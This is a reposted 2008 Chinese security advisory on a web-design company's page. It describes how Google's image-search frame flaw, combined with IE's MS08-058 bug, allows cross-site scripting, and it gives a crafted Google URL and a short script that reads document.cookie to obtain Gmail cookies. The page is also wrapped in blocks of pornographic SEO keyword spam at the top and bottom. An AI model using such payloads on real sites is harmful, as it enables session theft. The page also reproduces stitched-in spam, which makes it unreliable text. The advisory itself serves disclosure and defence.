国产一区二区白浆,国产真人作爱免费视频道歉,成人精品久久免费,啪啪啪动态图在线,成人亚洲91,边做饭边被躁bd苍井空图片 ,久久久国产精品成人一区二区三区,97自拍小视频
                深一集團(tuán)40%的客戶來(lái)自外地,80%的業(yè)務(wù)來(lái)自搜索引擎和良好口碑!
                微信 微信人工客服  |
                微信人工客服
                QQ在線溝通

                新聞中心

                全國(guó)業(yè)務(wù)咨詢請(qǐng)致電

                0755-27612861

                為您打響品牌第一炮
                • 在線QQ
                • 在線客服
                • 在線留言
                跨站腳本漏洞,利用MS08-058攻擊Google
                發(fā)布日期:2008-10-22   關(guān)鍵詞:觀蘭網(wǎng)站建設(shè)★觀蘭網(wǎng)頁(yè)設(shè)計(jì)◆觀瀾網(wǎng)站制作   已有 8484 人瀏覽
                國(guó)內(nèi)安全組織80sec近日發(fā)現(xiàn),Google提供的圖片搜索服務(wù)存在安全問(wèn)題,結(jié)合IE瀏覽器的MS08-058漏洞可以造成整站的跨站腳本漏洞,幾乎可以控制所有的Google服務(wù)和獲得目標(biāo)用戶的認(rèn)證信息。

                漏洞說(shuō)明:Google是全球最大的搜索引擎。同時(shí)Google擁有其他龐大的WEB應(yīng)用程序產(chǎn)品線,涉及EMAIL、BLOG、在線文檔、個(gè)人主頁(yè)、電子地圖、論壇、RSS等互聯(lián)網(wǎng)幾乎所有的應(yīng)用業(yè)務(wù)。80sec發(fā)現(xiàn)Google提供的圖片搜索服務(wù)存在安全問(wèn)題,結(jié)合IE瀏覽器的MS08-058漏洞可以造成整站的跨站腳本漏洞,幾乎可以控制所有的Google服務(wù)和獲得目標(biāo)用戶的認(rèn)證信息。

                漏洞站點(diǎn):http://www.google.com

                漏洞解析:Google提供的圖片搜索服務(wù)存在網(wǎng)頁(yè)框架安全問(wèn)題,惡意攻擊者可以指定網(wǎng)頁(yè)的內(nèi)嵌框架頁(yè)指向任意網(wǎng)頁(yè)。該服務(wù)提供的URL地址主域名可以更改成Google的其他業(yè)務(wù)的子域名,從而造成嚴(yán)重的釣魚網(wǎng)頁(yè)攻擊隱患。如下:黑客指定imgrefurl參數(shù)就可能構(gòu)造GMAIL相關(guān)服務(wù)的釣魚網(wǎng)頁(yè)。

                http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com&hl=com

                該漏洞結(jié)合由80SEC團(tuán)隊(duì)成員發(fā)現(xiàn)的IE瀏覽器的MS08-058部分漏洞可以造成GOOGLE整站的跨站腳本XSS漏洞,linx在《利用IE 框架跨域》文檔分析了MS08-058涉及網(wǎng)頁(yè)框架安全問(wèn)題,子框架網(wǎng)頁(yè)可以操作主框架的窗口句柄。這種類型的漏洞主要危害是不受IE瀏覽器同源策略的限制,可以跨域控制其他域的網(wǎng)頁(yè),影響所有的WEB應(yīng)用。微軟已經(jīng)在08年10月提供了MS08-058補(bǔ)丁修復(fù)了該漏洞。

                測(cè)試代碼:

                將Google的漏洞頁(yè)指向MS08-058漏洞攻擊頁(yè)

                http://mail.google.com/imgres?imgurl=80sec&imgrefurl=http://www.80sec.com/MS08-058.htm&hl=com

                MS08-058.htm內(nèi)容


                <script>
                setTimeout (
                function(){
                parent.location.href = new String("javascript:alert(document.cookie)");
                }
                ,1500);
                </script>

                即可獲得GAMIL的Cookie信息

                危害提醒:

                黑客利用瀏覽器漏洞可以使這種類型的低風(fēng)險(xiǎn)Web安全漏洞擴(kuò)大成影響所有Web應(yīng)用的高風(fēng)險(xiǎn)安全問(wèn)題,請(qǐng)各大網(wǎng)站及安全管理人員仔細(xì)分析評(píng)估MS08-058類型的Web安全問(wèn)題。

                注:本文來(lái)自深一集團(tuán)原創(chuàng)或轉(zhuǎn)截 http://www.fpweiyh.cn/newslist_462_2.html 如需轉(zhuǎn)載,請(qǐng)注明出處!
                0
                深一網(wǎng)絡(luò)公司專注設(shè)計(jì)14年
                全國(guó)網(wǎng)站建設(shè)
                深一云服務(wù)器深一云服務(wù)器
                高性能,高安全
                網(wǎng)絡(luò)公司拒絕不當(dāng)利
                崇尚野蠻生長(zhǎng)
                500強(qiáng)企業(yè)網(wǎng)500強(qiáng)企業(yè)網(wǎng)
                站建設(shè)供應(yīng)商
                10000家客戶案例10000家客戶案
                實(shí)力說(shuō)服力
                83位技術(shù)團(tuán)隊(duì)83位技術(shù)團(tuán)隊(duì)
                服務(wù)高保障
                深一只做有排名網(wǎng)站只做有排名
                有價(jià)值的網(wǎng)站
                200人服務(wù)團(tuán)隊(duì)200人服務(wù)團(tuán)隊(duì)
                追求客戶滿意
                主站蜘蛛池模板: 久久久综合九色综合鬼色| 国产一区二区精品福利| 国产欧美日韩视频怡春院| 无套内谢少妇高清毛片| 欧美激情综合五月色丁香| 无码h肉男男在线观看免费| 亚洲AV成人无码久久精品四虎| 国产在线精品二区| 国产jlzzjlzz视频免费看| 伊人天天久大香线蕉av色| 久久五十路丰满熟女中出| 国产中文字幕日韩精品| 欧美性xxxxx极品少妇| 老熟女激烈的高潮| 中国女人高潮hd| 日本欧美一区二区免费视频| 亚洲欧洲自拍拍偷无码| 久久精品人人槡人妻人人玩AV| 51久久国产露脸精品国产| 伊人色综合九久久天天蜜桃| 亚洲人成人无码网WWW电影首页 | 扒开腿狂躁女人爽出白浆| 蜜芽久久人人超碰爱香蕉 | 婷婷四虎东京热无码群交双飞视频 | 久久综合色一综合色88欧美| 黑人巨大videos极度另类| 国产精品国三级国产av| 国产99久久99热这里只有精品15| 亚洲国产福利成人一区二区| 2024av天堂手机在线观看| 欧洲 亚洲 国产图片综合| 四虎影视一区二区精品| 夜夜爽夜夜叫夜夜高潮| 免费国产高清在线精品一区| 国产精品 自在自线| 真人无码作爱免费视频| 麻豆一二三四区乱码| 国产极品嫩模在线观看91| 四房播色| 天堂资源中文最新版在线一区| 4hu四虎永久在线观看|